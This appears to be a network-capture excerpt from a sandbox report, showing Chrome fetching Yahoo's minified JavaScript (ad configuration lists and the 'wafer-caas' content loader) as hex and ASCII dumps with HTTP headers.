                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 3d 22 6d 6f 76 69 65 73 22 2c 65 2e 6d 75 73 69 63 3d 22 6d 75 73 69 63 22 2c 65 2e 6e 65 77 73 3d 22 6e 65 77 73 22 2c 65 2e 72 69 76 61 6c 73 3d 22 72 69 76 61 6c 73 22 2c 65 2e 73 70 6f 72 74 73 3d 22 73 70 6f 72 74 73 22 2c 65 2e 73 74 79 6c 65 3d 22 73 74 79 6c 65 22 2c 65 2e 74 65 63 68 3d 22 74 65 63 68 22 2c 65 2e 74 65 63 68 63 72 75 6e 63 68 3d 22 74 65 63 68 63 72 75 6e 63 68 22 7d 28 72 65 7c 7c 28 72 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 79 61 68 6f 6f 5f 6d 61 69 6c 3d 22 79 61 68 6f 6f 5f 6d 61 69 6c 22 2c 65 2e 61 6f 6c 5f 77 65 62 6d 61 69 6c 3d 22 61 6f 6c 5f 77 65 62 6d 61 69 6c 22 2c 65 2e 79 61 68 6f 6f 5f 72 6f 67 65 72 73 5f 6d 61 69 6c 3d 22 79 61 68 6f 6f 5f 72 6f 67 65 72 73 5f 6d 61 69 6c 22 2c 65 2e 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ="movies",e.music="music",e.news="news",e.rivals="rivals",e.sports="sports",e.style="style",e.tech="tech",e.techcrunch="techcrunch"}(re||(re={})),function(e){e.yahoo_mail="yahoo_mail",e.aol_webmail="aol_webmail",e.yahoo_rogers_mail="yahoo_rogers_mail",e.y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 33 77 65 77 67 22 2c 5b 61 65 2e 79 61 68 6f 6f 5f 61 74 74 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 61 65 2e 79 61 68 6f 6f 5f 66 72 6f 6e 74 69 65 72 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 61 65 2e 79 61 68 6f 6f 5f 76 65 72 69 7a 6f 6e 5f 6d 61 69 6c 5d 3a 22 64 34 39 70 68 38 6a 7a 33 77 65 77 67 22 2c 5b 61 65 2e 61 6f 6c 5f 77 65 62 6d 61 69 6c 5d 3a 22 64 32 75 65 76 33 69 33 36 35 7a 35 71 38 22 2c 5b 61 65 2e 79 61 68 6f 6f 5f 6c 6f 67 69 6e 5d 3a 22 64 31 74 71 72 73 37 76 7a 39 34 64 39 6b 22 2c 5b 61 65 2e 61 6f 6c 5f 6c 6f 67 69 6e 5d 3a 22 64 33 61 78 68 35 65 6d 67 35 65 63 65 30 22 2c 64 65 66 61 75 6c 74 3a 22 64 39 70 6d 73 67 36 6d 76 78 7a 7a 36 22 2c 73 61 6e 64 62 6f 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 3wewg",[ae.yahoo_att_mail]:"d49ph8jz3wewg",[ae.yahoo_frontier_mail]:"d49ph8jz3wewg",[ae.yahoo_verizon_mail]:"d49ph8jz3wewg",[ae.aol_webmail]:"d2uev3i365z5q8",[ae.yahoo_login]:"d1tqrs7vz94d9k",[ae.aol_login]:"d3axh5emg5ece0",default:"d9pmsg6mvxzz6",sandbox
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 2c 31 31 39 37 38 31 32 30 38 33 2c 39 36 33 39 39 38 38 35 34 2c 31 31 38 33 38 33 36 31 39 33 2c 31 31 39 37 38 31 32 31 35 30 2c 31 31 39 37 38 31 32 31 34 36 2c 31 31 39 37 38 31 32 31 32 38 2c 31 31 39 37 38 31 32 31 32 35 2c 31 31 39 37 38 31 32 31 32 36 2c 31 31 39 37 38 31 32 31 32 37 2c 31 31 39 37 38 31 32 31 33 33 2c 31 31 39 37 38 31 32 31 33 32 2c 31 31 39 37 38 31 32 31 33 34 2c 31 31 39 37 38 31 32 31 32 39 2c 31 31 39 37 38 31 32 31 33 30 2c 31 31 39 37 38 31 32 31 33 31 2c 31 31 38 37 33 33 36 32 30 31 2c 39 36 34 32 39 38 38 35 34 2c 31 31 38 37 33 33 36 32 30 32 2c 31 31 39 37 38 31 32 31 35 33 2c 31 31 39 37 38 31 32 31 35 34 2c 31 31 39 37 38 31 32 31 35 35 2c 31 31 39 37 38 31 32 31 35 36 2c 31 31 39 37 38 31 32 31 35 37 2c 31 31 39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,1197812083,963998854,1183836193,1197812150,1197812146,1197812128,1197812125,1197812126,1197812127,1197812133,1197812132,1197812134,1197812129,1197812130,1197812131,1187336201,964298854,1187336202,1197812153,1197812154,1197812155,1197812156,1197812157,119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 3a 22 79 66 69 6e 22 2c 5b 72 65 2e 66 70 5d 3a 22 79 68 70 22 2c 5b 72 65 2e 67 6d 61 5d 3a 22 79 6e 65 77 73 22 2c 5b 72 65 2e 6c 69 66 65 73 74 79 6c 65 5d 3a 22 79 6c 69 66 65 22 2c 5b 72 65 2e 6d 6f 6e 65 79 5d 3a 22 79 66 69 6e 22 2c 5b 72 65 2e 6d 6f 76 69 65 73 5d 3a 22 79 6d 6f 76 22 2c 5b 72 65 2e 6d 75 73 69 63 5d 3a 22 79 65 6e 74 22 2c 5b 72 65 2e 6e 65 77 73 5d 3a 22 79 6e 65 77 73 22 2c 5b 72 65 2e 73 70 6f 72 74 73 5d 3a 22 79 73 70 6f 72 74 73 22 2c 5b 72 65 2e 73 74 79 6c 65 5d 3a 22 79 6c 69 66 65 22 2c 5b 72 65 2e 74 65 63 68 5d 3a 22 79 74 65 63 68 22 7d 2c 52 65 3d 5b 22 63 6f 6d 6d 65 72 63 65 41 72 74 69 63 6c 65 54 79 70 65 22 2c 22 65 78 74 72 61 63 74 65 64 4b 65 79 57 6f 72 64 73 22 2c 22 61 62 6b 22 2c 22 68 61 73 68 74 61 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :"yfin",[re.fp]:"yhp",[re.gma]:"ynews",[re.lifestyle]:"ylife",[re.money]:"yfin",[re.movies]:"ymov",[re.music]:"yent",[re.news]:"ynews",[re.sports]:"ysports",[re.style]:"ylife",[re.tech]:"ytech"},Re=["commerceArticleType","extractedKeyWords","abk","hashtag
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 2c 22 4d 4f 4e 22 5d 7d 2c 57 65 3d 5b 22 61 79 5f 66 6c 6f 6f 72 22 2c 22 61 79 5f 66 6c 6f 6f 72 5f 6d 22 2c 22 61 79 5f 66 6c 6f 6f 72 5f 67 22 2c 22 61 79 5f 68 61 73 68 22 2c 22 68 62 5f 61 64 6f 6d 61 69 6e 22 2c 22 68 62 5f 61 64 69 64 22 2c 22 68 62 5f 62 69 64 64 65 72 22 2c 22 68 62 5f 62 69 64 64 65 72 5f 73 65 61 74 69 64 22 2c 22 68 62 5f 63 61 63 68 65 5f 68 6f 73 74 22 2c 22 68 62 5f 63 61 63 68 65 5f 69 64 22 2c 22 68 62 5f 63 61 63 68 65 5f 70 61 74 68 22 2c 22 68 62 5f 63 61 63 68 65 5f 72 65 67 69 6f 6e 22 2c 22 68 62 5f 63 72 69 64 22 2c 22 68 62 5f 64 65 61 6c 22 2c 22 68 62 5f 64 73 70 22 2c 22 68 62 5f 64 74 22 2c 22 68 62 5f 66 6f 72 6d 61 74 22 2c 22 68 62 5f 70 62 22 2c 22 68 62 5f 70 62 31 30 30 22 2c 22 68 62 5f 73 69 7a 65 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,"MON"]},We=["ay_floor","ay_floor_m","ay_floor_g","ay_hash","hb_adomain","hb_adid","hb_bidder","hb_bidder_seatid","hb_cache_host","hb_cache_id","hb_cache_path","hb_cache_region","hb_crid","hb_deal","hb_dsp","hb_dt","hb_format","hb_pb","hb_pb100","hb_size"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 72 28 69 3d 65 2e 74 6f 70 2c 73 3d 65 2e 62 6f 74 74 6f 6d 3b 69 3c 3d 73 3b 29 61 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 2b 73 29 2f 32 29 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 46 72 6f 6d 50 6f 69 6e 74 28 65 2e 6c 65 66 74 2c 61 29 2c 6f 3d 3d 3d 74 3f 73 3d 61 2d 31 3a 69 3d 61 2b 31 3b 65 6c 73 65 20 69 66 28 22 64 6f 77 6e 22 3d 3d 3d 6e 29 66 6f 72 28 69 3d 65 2e 74 6f 70 2c 73 3d 65 2e 62 6f 74 74 6f 6d 3b 69 3c 3d 73 3b 29 61 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 2b 73 29 2f 32 29 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 46 72 6f 6d 50 6f 69 6e 74 28 65 2e 6c 65 66 74 2c 61 29 2c 6f 3d 3d 3d 74 3f 69 3d 61 2b 31 3a 73 3d 61 2d 31 3b 65 6c 73 65 20 69 66 28 22 6c 65 66 74 22 3d 3d 3d 6e 29 66 6f 72 28 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r(i=e.top,s=e.bottom;i<=s;)a=Math.floor((i+s)/2),o=document.elementFromPoint(e.left,a),o===t?s=a-1:i=a+1;else if("down"===n)for(i=e.top,s=e.bottom;i<=s;)a=Math.floor((i+s)/2),o=document.elementFromPoint(e.left,a),o===t?i=a+1:s=a-1;else if("left"===n)for(i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 70 3a 69 2c 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 7d 3d 65 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 73 74 28 7b 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 69 7d 2c 74 2c 22 75 70 22 29 2c 61 3d 73 74 28 7b 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d 2c 74 2c 22 64 6f 77 6e 22 29 2c 63 3d 73 74 28 7b 62 6f 74 74 6f 6d 3a 61 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d 2c 74 2c 22 6c 65 66 74 22 29 3b 72 65 74 75 72 6e 28 61 2d 65 29 2a 28 73 74 28 7b 62 6f 74 74 6f 6d 3a 61 2c 6c 65 66 74 3a 63 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d 2c 74 2c 22 72 69 67 68 74 22 29 2d 63 29 2f 6e 7d 63 61 74 63 68 28 65 29 7b 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: p:i,bottom:s,left:o,right:r}=e;try{const e=st({bottom:s,left:o,right:r,top:i},t,"up"),a=st({bottom:s,left:o,right:r,top:e},t,"down"),c=st({bottom:a,left:o,right:r,top:e},t,"left");return(a-e)*(st({bottom:a,left:c,right:r,top:e},t,"right")-c)/n}catch(e){re


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    82192.168.2.44984487.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC538OUTGET /aaq/wf/wf-caas-1.36.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: /MDLyXpRkci3RGS2QNMElVAIsTbYYix2OEfwW+Sq0ZFaeRCv2yyHhvjqkQB78BABzcY/gmlW2vE=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 33S7VKTYGZTMZ6ZP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 26 Sep 2024 03:07:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 24 Jun 2024 16:46:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "6441e6cd44203711a611cd3db3c116b9"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: .aqk3FVBnJFz4qFL0k2URpC7m_x5fmjo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 29171
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 396783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 61 61 73 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 61 61 73 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-caas",[],t):"object"==typeof exports?exports["wafer-caas"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 70 2c 63 3d 6e 2e 70 61 72 74 6e 65 72 44 61 74 61 3b 69 66 28 21 63 7c 7c 21 6f 29 72 65 74 75 72 6e 20 72 26 26 72 28 69 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 3b 61 26 26 28 65 2e 64 61 74 61 2e 70 61 72 74 6e 65 72 44 61 74 61 2e 67 72 6f 75 70 4e 61 6d 65 3d 61 29 3b 76 61 72 20 6c 3d 63 2e 75 75 69 64 2c 64 3d 7b 61 73 73 65 74 73 3a 74 2c 69 74 65 6d 73 3a 5b 65 5d 7d 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 5f 5f 77 61 66 65 72 43 61 61 73 43 6f 6c 6c 65 63 74 69 6f 6e 2e 73 65 74 28 6c 2c 64 29 2c 65 7d 29 29 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: p,c=n.partnerData;if(!c||!o)return r&&r(i),Promise.resolve();a&&(e.data.partnerData.groupName=a);var l=c.uuid,d={assets:t,items:[e]};return window.__waferCaasCollection.set(l,d),e}))},y=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 72 29 26 26 28 65 5b 72 5d 3d 61 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 5b 5d 2c 72 3d 21 30 2c 69 3d 21 31 2c 73 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6e 2c 6f 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 72 3d 28 6e 3d 6f 2e 6e 65 78 74 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var r in a)Object.prototype.hasOwnProperty.call(a,r)&&(e[r]=a[r])}return e},C=function(){function e(e,t){var a=[],r=!0,i=!1,s=void 0;try{for(var n,o=e[Symbol.iterator]();!(r=(n=o.next(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 65 74 55 72 6c 50 61 72 61 6d 65 74 65 72 56 61 6c 75 65 42 79 4e 61 6d 65 2c 44 3d 52 2e 67 65 74 57 61 66 65 72 46 6f 72 54 79 70 65 2c 46 3d 52 2e 67 65 74 57 61 66 65 72 49 6e 73 74 61 6e 63 65 46 6f 72 45 6c 65 6d 2c 7a 3d 52 2e 73 65 74 54 69 6d 65 6f 75 74 2c 48 3d 5b 22 63 61 61 73 2d 63 6f 6c 6c 61 70 73 65 64 22 2c 22 63 61 61 73 2d 75 72 6c 22 2c 22 63 61 61 73 2d 75 75 69 64 22 5d 2c 59 3d 7b 7d 2c 55 3d 7b 7d 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 73 3d 61 2e 63 61 61 73 43 6f 6e 66 69 67 2c 6e 3d 61 2e 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: etUrlParameterValueByName,D=R.getWaferForType,F=R.getWaferInstanceForElem,z=R.setTimeout,H=["caas-collapsed","caas-url","caas-uuid"],Y={},U={},G=function(e){function t(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},s=a.caasConfig,n=a.e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 6c 2c 7b 22 63 61 61 73 2d 63 6f 6c 6c 61 70 73 65 64 22 3a 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 30 3a 4e 75 6d 62 65 72 28 66 29 2c 22 63 61 61 73 2d 75 72 6c 22 3a 75 2c 22 63 61 61 73 2d 75 75 69 64 22 3a 68 2c 63 61 63 68 65 3a 6e 75 6c 6c 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 31 3a 4e 75 6d 62 65 72 28 64 29 2c 63 61 61 73 43 6f 6e 66 69 67 3a 73 2c 63 61 63 68 65 53 74 72 61 74 65 67 79 3a 76 2c 63 61 63 68 65 54 74 6c 3a 6e 75 6c 6c 3d 3d 3d 70 7c 7c 76 6f 69 64 20 30 3d 3d 3d 70 3f 33 30 30 3a 4e 75 6d 62 65 72 28 70 29 2c 64 65 70 65 6e 64 65 6e 63 79 45 6c 65 6d 3a 50 2c 69 73 50 72 65 66 65 74 63 68 3a 6e 75 6c 6c 3d 3d 3d 6d 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 30 3a 4e 75 6d 62 65 72 28 6d 29 2c 74 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: l,{"caas-collapsed":null===f||void 0===f?0:Number(f),"caas-url":u,"caas-uuid":h,cache:null===d||void 0===d?1:Number(d),caasConfig:s,cacheStrategy:v,cacheTtl:null===p||void 0===p?300:Number(p),dependencyElem:P,isPrefetch:null===m||void 0===m?0:Number(m),ta
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 20 69 73 20 6d 69 73 73 69 6e 67 22 29 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 69 3d 72 2e 64 65 70 65 6e 64 65 6e 63 79 45 6c 65 6d 2c 73 3d 72 2e 73 75 63 63 65 73 73 43 6c 61 73 73 3b 69 66 28 69 26 26 21 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 6e 65 77 20 45 72 72 6f 72 28 22 64 65 70 65 6e 64 65 6e 63 79 20 6e 6f 74 20 79 65 74 20 63 6f 6d 70 6c 65 74 65 22 29 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 69 66 28 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 21 30 29 3b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 75 74 69 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: is missing"));var r=this._util,i=r.dependencyElem,s=r.successClass;if(i&&!i.classList.contains(s))return Promise.reject(new Error("dependency not yet complete"));var n=this._util.elem;if(n.classList.contains(s))return Promise.resolve(!0);var o=this._util
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC1300INData Raw: 73 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 65 29 7d 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 61 73 73 65 74 73 3b 69 66 28 21 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 3b 69 66 28 22 73 69 64 65 6b 69 63 6b 22 21 3d 3d 77 26 26 77 69 6e 64 6f 77 2e 43 41 41 53 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 61 3d 65 2e 73 74 79 6c 65 2c 72 3d 59 5b 77 5d 3b 72 65 74 75 72 6e 20 72 3f 72 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 3a 28 59 5b 77 5d 3d 79 28 74 2c 61 2c 77 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2c 59 5b 77 5d 29 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s).then(function(t){e(t)}).catch(function(e){r(e)})}).then(function(e){var t=e.assets;if(!t.length)return e;if("sidekick"!==w&&window.CAAS)return e;var a=e.style,r=Y[w];return r?r.then(function(){return e}):(Y[w]=y(t,a,w).then(function(){return e}),Y[w])}
